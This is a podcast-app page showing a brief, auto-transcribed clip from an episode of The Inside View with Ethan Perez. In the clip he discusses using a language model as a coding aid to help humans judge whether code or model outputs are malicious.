The Inside View cover image

Ethan Perez–Inverse Scaling, Language Feedback, Red Teaming

The Inside View

00:00

Is the Output Malicious or Not?

In a lot of cases like that might be the case, if human judgment is reliable. We can have something like, you know, we're looking at some piece of code ind return to figure out, is this malicious or not? And we have a language model that's like perperprogaming with us,. And then, like, with that that tool, we might be better, a better positioned to produce accurate labels for whether an output is harmful or not.

Transcript
Play full episode

The AI-powered Podcast Player

Save insights by tapping your headphones, chat with episodes, discover the best highlights - and more!
App store bannerPlay store banner
Get the app